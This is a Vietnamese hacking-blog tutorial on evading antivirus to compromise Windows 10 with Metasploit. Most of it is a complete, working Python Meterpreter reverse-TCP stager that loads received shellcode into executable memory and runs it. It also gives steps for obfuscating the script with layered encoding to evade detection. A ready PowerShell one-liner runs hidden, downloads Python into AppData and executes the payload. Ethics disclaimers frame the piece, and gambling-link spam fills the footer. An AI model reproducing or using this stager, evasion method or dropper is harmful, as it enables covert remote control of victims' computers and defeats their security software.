• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Mình đã Bypass AV xâm nhập Windows 10 với Metasploit và Python như thế nào ?

Hevin by Hevin
in Basic Hacking
A A
6

Mục lục bài viết

  1. Khái niệm sơ qua về Metasploit
  2. Meterpreter Reverse TCP trong Metasploit là gì ?
  3. Tạo payload Meterpreter Reverse TCP trong Metasploit với Python
  4. Tấn công Windows 10 với Metasploit và Python

An ninh mạng đóng vai trò quan trọng trong thế giới công nghệ ngày nay. Việc kiểm tra và nâng cao độ bảo mật hệ thống là trách nhiệm của người quản trị hệ thống và chuyên gia an ninh. Tuy nhiên, việc vượt qua phần mềm chống virus ( Bypass AntiVirus ) đã trở thành một phần không thể thiếu trong quá trình kiểm tra và đánh giá an ninh. Trong bài viết này, mình sẽ chia sẻ với bạn về kinh nghiệm thành công của mình trong việc Bypass AV và xâm nhập vào một máy tính chạy hệ điều hành Windows 10 bằng cách sử dụng Metasploit và Python. Đây là một quá trình thử thách và mang lại sự hiểu biết sâu hơn về phần mềm chống vi-rút và phát hiện các lỗ hổng trong hệ thống. Sau vài ngày mình tìm tòi về payload windows/meterpreter/reverse_tcp của Metasploit. mình đã viết ra 1 đoạn Script Python nhỏ cho payload này và cuối cùng thực hiện việc xâm nhập vào máy tính mục tiêu với đoạn script đó. Hãy cùng mình khám phá và tìm hiểu quá trình bypass AV và xâm nhập vào Windows 10 bằng cách sử dụng Metasploit và Python trong bài viết này nhé !

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

Lưu ý: Bài viết không khuyến khích việc sử dụng kỹ thuật này cho bất kỳ hoạt động bất hợp pháp hoặc gây hại cho người khác. Anonyviet hy vọng rằng thông qua việc chia sẻ kiến thức này, bạn có thể nâng cao hiểu biết về an ninh mạng và áp dụng các biện pháp bảo vệ để bảo vệ hệ thống của mình. Mọi hành vi bất hợp pháp Anonyviet sẽ không chịu mọi trách nhiệm !

Các bài viết liên quan

Cách Hacker Bypass AV xâm nhập Windows với Autoit

Cách Hacker Bypass AV xâm nhập Windows với Autoit

09/01/2024
6 cách bảo vệ máy tính khỏi virus khi bạn không có phần mềm diệt Virus 3

6 cách bảo vệ máy tính khỏi virus khi bạn không có phần mềm diệt Virus

25/08/2023
Hide Malware In Image

Hacker ẩn Malware vào hình ảnh và thực thi như thế nào ?

05/08/2023
Cách tạo trình quét Virus đơn giản bằng API của Virus Total 4

Cách tạo trình quét Virus đơn giản bằng API của Virus Total

25/05/2023

Khái niệm sơ qua về Metasploit

Metasploit là một framework mã nguồn mở rất phổ biến trong lĩnh vực kiểm thử xâm nhập và khai thác lỗ hổng. Nó được sử dụng để tạo ra một môi trường điều kiện nhân tạo để phân tích các lỗ hổng bảo mật, giúp các chuyên gia bảo mật tìm ra các điểm yếu trong hệ thống mạng và ứng dụng của họ. Metasploit cung cấp rất nhiều công cụ và tài nguyên để tấn công và khai thác các lỗ hổng trong hệ thống, giúp chuyên gia bảo mật kiểm tra và tăng cường tính bảo mật của mạng và ứng dụng. Metasploit được phát triển bởi Rapid7 và sử dụng ngôn ngữ lập trình Ruby, với giao diện dòng lệnh và đồ họa để người dùng dễ dàng sử dụng. Nó cho phép người dùng tự động hóa quá trình kiểm thử và tìm ra các lỗ hổng, tăng cường hiệu suất và tiết kiệm thời gian. Metasploit cung cấp nhiều tính năng như scan port, tìm kiếm lỗ hổng, khai thác, tràn bộ đệm, thu thập thông tin, tạo mã độc,…. Nó cũng cung cấp một cơ sở dữ liệu lỗ hổng rộng lớn, cho phép người dùng tìm kiếm và khai thác các lỗ hổng đã được biết đến. Không những thế nó còn là một công cụ được sử dụng để kiểm tra và củng cố tính bảo mật của hệ thống từ đó cung cấp một môi trường an toàn hơn cho các hệ thống mạng và ứng dụng

Meterpreter Reverse TCP trong Metasploit là gì ?

Meterpreter Reverse TCP là một loại kết nối ngược (reverse connection) được sử dụng trong Metasploit Framework để tạo một secure channel ( kênh truyền thông an toàn ) giữa máy tấn công và máy mục tiêu.

Khi sử dụng Meterpreter Reverse TCP, máy hacker đóng vai trò là máy chủ lắng nghe (listener), trong khi máy nạn nhân là máy khách (client). Quá trình hoạt động diễn ra như sau:

  1. Máy hacker khởi động một cổng TCP cụ thể ( listener )
  2. Máy nạn nhân lây nhiễm bởi một payload (chương trình độc hại) thông qua một phương thức tấn công, ví dụ như download phần mềm độc hại,  hoặc xâm nhập qua email,…
  3. Payload được thiết lập trên máy mục tiêu và kết nối ngược (reverse connection) được thiết lập từ máy nạn nhân đến máy hacker thông qua giao thức TCP.
  4. Khi kết nối được thiết lập, Meterpreter là một công cụ quản lý tấn công mạnh mẽ trong Metasploit, được chạy trên máy nạn nhân và giao tiếp với máy hacker thông qua secure channel đã thiết lập
Xem thêm:  Các cách tấn công của Hacker dùng để chiếm quyền tài khoản của bạn

Meterpreter Reverse TCP cung cấp nhiều tính năng mạnh mẽ cho hacker, bao gồm khả năng kiểm soát từ xa máy nạn nhân, thực thi các lệnh trên hệ thống của nạn nhân, truy cập vào các tệp và thư mục, thu thập thông tin quan trọng và thậm chí thâm nhập sâu vào hệ thống

Tạo payload Meterpreter Reverse TCP trong Metasploit với Python

Chi tiết cấu trúc payload:

  • Kết nối đến máy hacker thông qua socket TCP/IP.
  • Nhận dữ liệu từ kết nối và giải nén các thông tin cần thiết.
  • Sử dụng thư viện ctypes trong Python để cấp phát bộ nhớ và sao chép mã máy thấp vào bộ nhớ.
  • Tạo một luồng riêng biệt để thực thi mã máy thấp trong bộ nhớ.
  • Dừng chương trình chính để duy trì quyền điều khiển từ xa

Đoạn code Python này bắt đầu bằng việc import các thư viện cần thiết để làm việc với socket, struct, time, threading và ctypes

import socket
import struct
import time
import threading
import ctypes

 

Biến ip định nghĩa địa chỉ IP mà máy tính đang chạy chương trình sẽ kết nối đến. Biến port chỉ định số cổng để kết nối tới hacker

ip = "<ip>" # địa chỉ ip hacker
port = <port> # số cổng hacker đã mở bên Metasploit

 

Khởi tạo biến connected để theo dõi trạng thái kết nối và sử dụng vòng lặp while để thử kết nối với máy hacker cho đến khi thành công. Trong vòng lặp while này, một socket được tạo và cố gắng kết nối đến địa chỉ IP và cổng của hacker. Nếu kết nối thành công, biến connected được đặt thành True và vòng lặp dừng lại. Nếu xảy ra lỗi TimeoutError, payload sẽ chờ 0.1 giây rồi kết nối lại

connected = False

while not connected:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        connected = True
    except TimeoutError:
        time.sleep(0.1)

 

Nhận dữ liệu đầu tiên từ socket. Dòng code bên dưới sử dụng phương thức recv() của socket để nhận 4 byte dữ liệu đầu tiên từ kết nối

data = s.recv(4)

 

Giải nén độ dài dữ liệu từ dữ liệu nhận được. Dòng code bên dưới sử dụng hàm unpack() từ module struct để giải nén 4 byte đầu tiên của dữ liệu thành một số nguyên không dấu 32 bit (unsigned integer) được đóng gói theo định dạng little-endian. Sau đó, giá trị này được cộng với 5 và gán cho biến data_len. Việc cộng 5 đến data_len là do dữ liệu sau khi giải nén bao gồm cả 4 byte đầu tiên nhưng cần phải chứa thêm 5 byte

data_len = struct.unpack("<I", data)[0] + 5

 

Tiếp tục nhận dữ liệu từ socket cho đến khi đủ độ dài đã giải nén. Vòng lặp này sử dụng phương thức recv() để nhận dữ liệu từ socket cho đến khi tổng chiều dài của dữ liệu đã nhận được bằng với data_len

while len(data) < data_len:
    data += s.recv(data_len - len(data))

 

Đóng gói handle của socket và dữ liệu đã nhận vào một bytearray mới. Với dòng code này sử dụng hàm pack() từ module struct để đóng gói số hiệu file (file descriptor) của socket (s.fileno()) thành một bytearray handle. Sau đó, các bytearray khác được tạo ra bằng cách ghép nối bytearray [0xBF]một bytearray chứa một phần tử duy nhất là giá trị 0xBF (191 trong hệ thập phân), bytearray(handle) chuyển đổi biến handle từ kiểu dữ liệu được đóng gói thành một bytearray mới.data[4:] truy cập vào phần dữ liệu đã nhận từ socket, bắt đầu từ byte thứ 4 (bỏ qua 4 byte đầu tiên). Toàn bộ các bytearray được ghép nối với nhau bằng phép cộng (+) để tạo ra bytearray data mới

handle = struct.pack("<I", s.fileno())
data = bytearray([0xBF]) + bytearray(handle) + data[4:]

 

Xem thêm:  5 cách hacker sử dụng để hack tài khoản ngân hàng của bạn

Hai hằng số MEM_COMMIT và PAGE_EXECUTE_READWRITE được định nghĩa để sử dụng trong việc cấp phát bộ nhớ và thiết lập quyền truy cập bộ nhớ. MEM_COMMIT là một hằng số được đặt giá trị là 0x1000, biểu thị chế độ cấp phát bộ nhớ trong hàm VirtualAlloc().Giá trị 0x1000 tương ứng với cấp phát vùng nhớ mới và cấu hình quyền truy cập vào vùng nhớ đó. PAGE_EXECUTE_READWRITE là một hằng số có giá trị là 0x40, biểu thị quyền truy cập vào vùng nhớ trong hàm VirtualAlloc(). Giá trị 0x40 đại diện cho quyền truy cập đọc, ghi và thực thi (execute) cho vùng nhớ đó. Bằng cách sử dụng PAGE_EXECUTE_READWRITE, mình cho phép vùng nhớ được cấp phát có thể chứa mã thực thi và có thể đọc và ghi dữ liệu

MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40

 

Sử dụng thư viện kernel32 từ ctypes để cấp phát và sao chép dữ liệu vào bộ nhớ. Dòng code bên dưới sử dụng hàm VirtualAlloc() của thư viện kernel32 để cấp phát một khối bộ nhớ có kích thước là len(data). Khối bộ nhớ này sẽ được cấp phát với quyền truy cập PAGE_EXECUTE_READWRITE. Sau đó, dữ liệu từ data được sao chép vào địa chỉ bộ nhớ được cấp phát bằng cách sử dụng ctypes.memmove(). Các dòng code mà mình đã đề cập có liên quan đến việc sử dụng Windows API thông qua ctypes để cấp phát và sao chép dữ liệu vào vùng nhớ được cấp phát. Cụ thể như sau:

  1. kernel32 = ctypes.windll.kernel32:
    • Dòng này tạo một đối tượng kernel32 để truy cập các hàm của Windows API trong thư viện kernel32.dll.
    • ctypes.windll là một cách để truy cập các thư viện được cung cấp bởi hệ điều hành Windows.
  2. address = kernel32.VirtualAlloc(None, len(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE):
    • kernel32.VirtualAlloc() là một hàm trong Windows API để cấp phát vùng nhớ ảo.
    • Dòng mã trên gọi hàm VirtualAlloc() để cấp phát một vùng nhớ ảo mới.
    • None đại diện cho địa chỉ cơ sở (base address) của vùng nhớ ảo (do không xác định trước).
    • len(data) xác định kích thước (số byte) của vùng nhớ cần cấp phát, dựa trên kích thước của data.
    • MEM_COMMIT là hằng số đã được định nghĩa trước, biểu thị chế độ cấp phát bộ nhớ.
    • PAGE_EXECUTE_READWRITE cũng là hằng số đã được định nghĩa trước, biểu thị quyền truy cập vào vùng nhớ.
  3. data_array = (ctypes.c_char * len(data)).from_buffer(data):
    • Dòng mã này tạo một mảng data_array với kiểu dữ liệu ctypes.c_char và kích thước là len(data).
    • ctypes.c_char đại diện cho một ký tự (byte) trong ctypes.
    • .from_buffer(data) tạo một view (chế độ xem) của mảng data đã được nhận trước đó, nghĩa là mảng data_array sẽ trỏ đến vùng nhớ của data để sử dụng chung dữ liệu.
  4. ctypes.memmove(address, ctypes.pointer(data_array), len(data)):
    • ctypes.memmove() là một hàm trong ctypes để sao chép dữ liệu từ một vùng nhớ đến một vùng nhớ khác.
    • Dòng mã trên sao chép nội dung của data_array vào vùng nhớ được cấp phát address.
    • address là địa chỉ cần sao chép dữ liệu đến.
    • ctypes.pointer(data_array) trả về con trỏ đến vùng nhớ của data_array.
    • len(data) xác định số byte cần sao chép

Nói chung là đoạn code bên dưới sử dụng Windows API thông qua ctypes để cấp phát một vùng nhớ ảo mới, tạo một mảng dữ liệu data_array trỏ đến dữ liệu đã nhận từ socket, và sau đó sao chép dữ liệu từ data_array vào vùng nhớ đã được cấp phát. Quá trình này chuẩn bị cho việc thực thi mã thực thi từ vùng nhớ ảo đó

kernel32 = ctypes.windll.kernel32
address = kernel32.VirtualAlloc(None, len(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
data_array = (ctypes.c_char * len(data)).from_buffer(data)
ctypes.memmove(address, ctypes.pointer(data_array), len(data))

 

Với dòng code bên dưới, mình đã tạo một luồng mới bằng cách sử dụng module threading.Thread(). Luồng này sẽ thực thi mã máy thấp tại địa chỉ bộ nhớ được cấp phát. Địa chỉ bộ nhớ này được truyền vào target dưới dạng con trỏ hàm ctypes.CFUNCTYPE(None). Không có đối số được truyền vào luồng (args=())

thread = threading.Thread(target=ctypes.cast(address, ctypes.CFUNCTYPE(None)), args=())
thread.start()

 

Xem thêm:  Video Hướng dẫn DarkComet RAT, Cybergate RAT, njRAT

Dòng code cuối cùng dùng để cho payload chạy trong 9999999 giây tức là khoảng 115 ngày, bạn có thể tăng thêm hoặc giảm thời gian tùy ý nhé

time.sleep(9999999)

 

Đây là toàn bộ mã nguồn mà mình đã tạo:

import socket
import struct
import time
import threading
import ctypes

ip = "<ip>" # địa chỉ ip hacker 
port = <port> # số cổng hacker đã mở bên Metasploit
connected = False

while not connected:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        connected = True
    except TimeoutError:
        time.sleep(0.1)

data = s.recv(4)

data_len = struct.unpack("<I", data)[0] + 5
while len(data) < data_len:
    data += s.recv(data_len - len(data))

handle = struct.pack("<I", s.fileno())

data = bytearray([0xBF]) + bytearray(handle) + data[4:]

MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40

kernel32 = ctypes.windll.kernel32
address = kernel32.VirtualAlloc(None, len(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
data_array = (ctypes.c_char * len(data)).from_buffer(data)
ctypes.memmove(address, ctypes.pointer(data_array), len(data))


thread = threading.Thread(target=ctypes.cast(address, ctypes.CFUNCTYPE(None)), args=())
thread.start()

time.sleep(9999999)

Bây giờ chúng ta sẽ đến phần tấn công Windows 10 với Metasploit và Python nhé

Tấn công Windows 10 với Metasploit và Python

Bây giờ, máy hacker có địa chỉ ip 192.168.1.3 và port tcp 9999, tiếp đến địa chỉ ip máy nạn nhân là 192.168.1.5, mình sẽ tiến hành setup trên Metasploit như sau:

Bypass AV hack WIndows 10 với Metasploit và Python

 

Được rồi, giờ mình mã hóa script python với module marshal, zlib, lzma và base64 để tránh các phần mềm AntiVirus quét được, đoạn script python đã mã hóa có dạng như sau:

bypass AV xâm nhập Windows 10 với Metasploit và Python

 

Sau khi mã hóa script python với module marshal, zlib, lzma và base64, mình lại mã hóa toàn bộ script với base64 tại website base64encode.org

Bấm vào “ENCODE” để bắt đầu mã hóa

bypass AV xâm nhập Windows 10 với Metasploit và Python

 

Bấm vào “Copy to clipboard” để copy mã base64 lại nhé

bypass AV xâm nhập Windows 10 với Metasploit và Python

Đây là đoạn lệnh Powershell mình đã viết sẵn, việc của bạn là chỉ cần paste toàn bộ script được mã hóa bằng base64. Bạn thay thế <your base64code payload>thành mã base64 của bạn

powershell.exe -WindowStyle Hidden -Command "$code_payload='<your base64code payload>'; $bat1='@echo off'; $bat2='pythonRun module.py'; $cd_appdata=$Env:AppData; Set-Location -Path $cd_appdata; $current_cwd=Get-Location; if (Test-Path -Path 'pythonRun') { Set-Location -Path \"$current_cwd\pythonRun\"; $payload=$code_payload; $decoded=[System.Convert]::FromBase64String($payload); $bat1=$bat1; $bat2=$bat2; $bat1 + \"`r`n\" + $bat2 | Out-File -FilePath svc.bat -Encoding ascii; Set-Content -Path 'module.py' -Value ([System.Text.Encoding]::ASCII.GetString($decoded)); Start-Process -FilePath svc.bat -WindowStyle Hidden } else { Invoke-WebRequest -Uri 'https://www.python.org/ftp/python/3.10.9/python-3.10.9-embed-win32.zip' -OutFile pythonRun.zip; Expand-Archive -Path pythonRun.zip -DestinationPath pythonRun; Start-Sleep -Seconds 1; Rename-Item -Path \"$current_cwd\pythonRun\python.exe\" -NewName pythonRun.exe; Remove-Item -Path pythonRun.zip; Set-Location -Path \"$current_cwd\pythonRun\"; $payload=$code_payload; $decoded=[System.Convert]::FromBase64String($payload); $bat1=$bat1; $bat2=$bat2; $bat1 + \"`r`n\" + $bat2 | Out-File -FilePath svc.bat -Encoding ascii; Set-Content -Path 'module.py' -Value ([System.Text.Encoding]::ASCII.GetString($decoded)); Start-Process -FilePath svc.bat -WindowStyle Hidden }"

 

Đây là đoạn lệnh của mình, chỉ cần thực thi đoạn lệnh Powershell là nó tự động tải Python vào máy nạn nhân và thực thi đoạn script Python độc hại đã được mã hóa bằng base64

bypass AV xâm nhập Windows 10 với Metasploit và Python

 

Và đây là kết quả

Như vậy, chưa đầy 50 dòng code Python cộng với 1 đoạn lệnh Powershell và công cụ Metasploit, mình đã có thể xâm nhập Windows 10 rồi. Mình muốn nhấn mạnh rằng việc tấn công máy tính của người khác là trái với đạo đức và pháp luật. Mình viết bài này chỉ để giúp người đọc hiểu thêm về cách thức hoạt động của các mã độc và cách phòng chống nó. Nếu bạn là một chuyên gia bảo mật, mình hy vọng rằng bài viết này sẽ giúp bạn nâng cao kiến thức và kỹ năng của mình trong việc sử dụng công cụ Metasploit để kiểm tra tính an toàn của hệ thống và bảo vệ chúng khỏi các cuộc tấn công từ phía tin tặc. Và nếu bạn là một người dùng bình thường, mình khuyên bạn luôn cập nhật các phần mềm bảo mật và hạn chế việc tải các phần mềm từ những nguồn không rõ nguồn gốc để bảo vệ tốt nhất cho hệ thống của mình.

Cuối cùng, mình muốn nhấn mạnh rằng việc sử dụng các công cụ Metasploit cũng như là các công cụ khác để xâm nhập vào hệ thống của người khác là trái với đạo đức và pháp luật. Chúng ta cần tôn trọng quyền riêng tư và bảo vệ an toàn thông tin của nhau nhé. Chúc bạn có một ngày tốt lành ! BYE BYE !!!!

 

Bạn cũng có thể đọc thêm bài viết Cách quét lỗ hổng bằng Metasploit 

Tags: avBypass avvirus
Hevin

Hevin

Related Posts

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit 5
Basic Hacking

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit

08/03/2025
Cách khai thác lỗ hổng DLL Hijacking trên Windows 6
Basic Hacking

Cách khai thác lỗ hổng DLL Hijacking trên Windows

05/03/2025
Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 7
Basic Hacking

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

10/02/2025
Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 8
Basic Hacking

Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn

14/12/2024
Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp 9
Basic Hacking

Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp

12/12/2024
Seekr: Thu thập & quản lý dữ liệu OSINT 10
Basic Hacking

Seekr: Thu thập & quản lý dữ liệu OSINT

22/11/2024
Subscribe
Notify of
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

6 Comments
oldest
newest
Inline Feedbacks
View all comments
huy hoang
huy hoang
1 year ago

Mình vẫn chưa hiểu nếu cách này thì chỉ dùng cho cùng mạng LAn đúng không chứ từ xa qua ip tĩnh và port thì máy nạn nhân nó đầu tấn công được

Reply
AnonyViet
Admin
AnonyViet
1 year ago
Reply to  huy hoang

tấn công từ xa thì bạn nat port

Reply
long
long
3 months ago
Reply to  AnonyViet

có cách nào không cần nat port không bác, forward port đc ko bác

Reply
AnonyViet
Admin
AnonyViet
3 months ago
Reply to  long

bạn xem các hướng dẫn ở đây https://anonyviet.com/?s=nat+port

Reply
Trung
Trung
1 year ago

cho mình hỏi nếu chx thêm your base64code payload vào máy thì chạy không sao đúng không? Mình lỡ chạy nhma chưa thêm cái your base64code payload của mình vào

Reply
hevin
hevin
7 months ago
Reply to  Trung

Đúng rồi bạn, chưa thêm base64 code máy chạy không sao đâu

Reply
wpdiscuz   wpDiscuz

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

Tự động dọn dẹp máy tính dễ dàng với BleachBit 11

Tự động dọn dẹp máy tính dễ dàng với BleachBit

by Thanh Kim
27/06/2025
0

Tăng tốc lập trình x10 với Gemini CLI - Công cụ AI miễn phí từ Google 12

Tăng tốc lập trình x10 với Gemini CLI – Công cụ AI miễn phí từ Google

by Thanh Kim
27/06/2025
0

Lướt web vui hơn với Cursor Cat: Mèo rượt con trỏ chuột cực hài 13

Lướt web vui hơn với Cursor Cat: Mèo rượt con trỏ chuột cực hài

by Thanh Kim
26/06/2025
0

Nguyên nhân các group Facebook bay màu hàng loạt 14

Nguyên nhân các group Facebook bay màu hàng loạt

by Thanh Kim
25/06/2025
0

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

Bình luận gần đây

  • AnonyViet trong Hướng dẫn tự tạo SOCKS5 trên Ubuntu
  • Quốc Anh trong Hướng dẫn tự tạo SOCKS5 trên Ubuntu
  • phuong trong KTimer: Lên lịch tắt máy, ngủ đông dễ dàng cho người bận rộn
  • sagar trong Cách khai thác lỗ hổng DLL Hijacking trên Windows
  • nikolai trong Hướng dẫn Hack Camera Điện thoại bằng cách gửi Link Website
  • AI Question Generator trong Hướng dẫn Việt hóa GTA 5 tải từ EPIC để chơi bằng tiếng Việt
  • Stiff trong Cách tạo MTProto Proxy riêng để dùng Telegram khi bị chặn
  • AnonyViet trong Học miễn phí khóa học Phổ cập AI và nhận chứng chỉ từ Trung ương Đoàn
  • Quốc trong Học miễn phí khóa học Phổ cập AI và nhận chứng chỉ từ Trung ương Đoàn
  • AnonyViet trong Cách tạo MTProto Proxy riêng để dùng Telegram khi bị chặn
  • Tienban trong Cách tạo MTProto Proxy riêng để dùng Telegram khi bị chặn
  • Tùng trong So sánh Telegram miễn phí và Telegram Premium
  • blowsy trong Cách Active Key Sublime Text 4 – Tải Sublime Text 4 Full Key
  • haohao2210 trong Hướng dẫn đăng ký ChatGPT Team giá 1$
  • AnonyViet trong Hướng dẫn đăng ký ChatGPT Team giá 1$
  • haohao2210 trong Hướng dẫn đăng ký ChatGPT Team giá 1$
  • Lelo trong TOP 5 thẻ ảo thanh toán quảng cáo và mua hàng trực tuyến năm 2025
  • Hồ Minh Nhựt trong Hướng dẫn chế ảnh số dư tài khoản MB Bank
  • Yagami trong Hướng dẫn đăng ký ChatGPT Team giá 1$
  • abc trong Cách nhận License Key Driver Booster Pro 12 6 tháng miễn phí

©2025 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ Danh mục kết quả xổ số hôm nay trực tiếp bóng đá xoilac colatv truc tiep bong da trang chủ hi88 trang chủ hi88 kubet777 KUBET xoilac nhà cái 8xbet https://vn88-vn.com/ https://i9bet-vn.net/ https://typhu88-vn.com/ https://hb88-vn.org/ Kubet bong88 https://cwfun.org/ https://hi88.gives/ 33win 789win ww88 888B kubet https://thabet-vn.com/ Ae888 kubet 789Club 188BET 188BET Link https://789club10.pro kubet hi88 188bet 8kbet pg88 99ok xin88 good88 https://www.chantalsutherlandjockey.com/ Sun win https://www.go88vn.uk.com/ https://www.rik-vip.uk.com/ kubet w88 cakhiatv Thapcam TV https://78win.id/ Game bài đổi thưởng https://33winlink.live/ 68gamebai FB88 hi88 W88 https://78win.dental/ ww88 f168 f8bet k8cc https://qq883a.com/ Leo88 Leo88 nha cai uy tin mu88 casino Vebo TV https://v9betnet.com/ https://ee88vie.com/ 69vn max88 manclub iwin 79king mu88 com https://78winn.city/ ww88 SV388 69VN Zomclub 8kbet https://hi88fz.com/ XO88 https://u888.one/ ABC8 https://go886.org/ https://sunwin10.org/ https://789club10.life/ Jun88 https://jun88pro.org/ 77Bet HB88 123b https://33winvn.me/ win55 Tha bet hello88 188bet kubet11 k8cc f168 FB88 luckywin https://bet88.love/ 188BET fm88 https://horse.uk.com https://xin88.de.com/ SH BET qh88 https://918xxy.com/ 58WIN https://77betvn.me/ https://hb88vn.live/ kubet thailand 789club tài xỉu online uy tín Game bài đổi thưởng uy tín https://www.newfacespac.com/ vip66 xoso66 789 BET vip66 xoso66 luckywin Nhà cái uy tín ww88 69vn https://79kingg.me/ f168 88vv https://good88gd.com/ https://tp88fun.com/ OK365 Nhà Cái WW88 6789 Daga sodo66 45678 trang chủ hi88 https://bet88bb.com/ 8XBET daga https://8kbet.party/ sin88 RR88 8kbet Mitom TV nhacaiuytin f8bet hello88 qq88 Luckywin 6789 NH88 https://abc8.furniture/ TK88 leo88 hb88 77bet jun88.info https://jbo.center/ 88aa 88aa https://789p.express/ Kuwin GK88 kubet fb68 https://bk8z.com.co/ 79king 789p f168 https://abc8gd.com/ 23win BET88 8kbet PG88 SV388 F168 SV388 Kuwin hi88 gg 8kbet fun88 https://a23win.com/ UW99 SAOWIN https://bet886.pro/ https://new88.land/ Nohu90 8kbet PG88 https://69vn.attorney/ 88VV Hello88 https://asf.us.com/ 3389 33win GK88 tải app kubet https://68gamebai.game/ 789f 8kbet https://ok9.today/ Xoso66 Vip66 ABC8 kubet11 hitclub Wi88 32WIN HB88 HB88 https://bet88.tennis/ https://luongsontv44.com/ ww88 https://j88ss.com/ https://789wincom.me/ https://hubett2.org/ bong99 https://mb66.bz/ BET88 69vn com https://fb88nu.com/ qh88 Kubet https://nohu90phut.com/ bet88 https://vibong88.com/ https://nhacaiuytinbiz.com/ king88 https://thabet789.net/ Good88 Ga6789 nhacaiuytin Daga Link https://keonhacai.select/ bet88 FB88 https://69vnn.trading/ https://bet88org.com/ https://88clbus.com/ https://u888rse.com/ XOSO66 https://polodemocratico.info/ https://tartankicks.uk/ https://typhu888.shop https://typhu888.site ae888 88vv bj88 W88 W88 https://fun88.place/ b52 club 13 WIN Bet88 69vn https://nohu90.cc/ 88CLB kubet xin88 ee88 69vn iwin nohu789.net nohu.express fun88 Daga 69vn new882.info kubet77 Hi88 8day Thabet 33win Bk8 fun88 789win w88 nhà cái uy tín Go88 sunwin sunwin sunwin jun88 bk8 rikvip hitclub sunwin go88 98win 789bet m88 s666 sv388 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 78win abc8 c54 new88 i9bet ok365 ae888 https://keonhacai.fund/ https://98win.deal/ FB88 QH88 Tài Xỉu Go88 kèo nhà cái 5 nohu90.store Fun88 bj88 https://gamebai.in.net/ 1bet88 pro nha cai uy tin https://max886.org/ 69VN sunwin NEW88 https://debetoz.com/ hit club e2bet https://bet88zs.com/ 32win 68 game bài NH88 game bài đổi thưởng W88 PG88 https://789win.health/ bet88 33win com F8BET QQ88 https://king88.international/ WIN55 e2bet bl-555.it.com https://bl555.org.uk/ HUBET VN88 78win 789BET 58Win w88 S666 Typhu88 V9BET Bong88 Fb88 sv388 KIWI 12bet Kubet IWIN IWIN good88 i9BET 99ok 123b 789win Good88 79king Nhà cái uy tín Bk8 Hb88 w88 fun88 Kèo nhà cái Bet88 789F 78win 8kbet https://vb88.social/ J88 https://tk88678.com/ https://t8kbet.com/ ww88 https://ok9393.com/ 69VN 69VN 69VN 69VN KUBET88 max88 net88 soc88 vn138 qq88 com 23win.solar https://bk8co.net/ https://mitomtv.mobi/ 88vv EV88 PG88 daga 23win ev88 sv368 luck8 NN88 Sbobet For88 https://u888me.info/ https://23win0.com/ https://23winme.com 8kbet F168 789BET https://king88aff.com/ 58WIN NOHU90 bet88 88CLB 99ok 97win F168 58WIN 123Win Xoso66 BET88 uu88 https://okking.uk/ alo789 sv368 sv388 dagatructiep ev88 99ok 88vn F168 23win 78win 88clb 18win 79KING SV66 RR88 daga HB88 Tk88 qq88 okking BL555 BL555 rr88 hello88 https://rikbet.team/ https://alo789.rocks/ https://ok365.jpn.com/ https://v9beti.com/ https://23win.codes/ https://58win.digital/ 68win nhà cái uy tín https://qh88.cymru https://qh88.casa https://m88club.biz https://m88vinvn.com https://79kinggod.club https://79kingvn.xyz 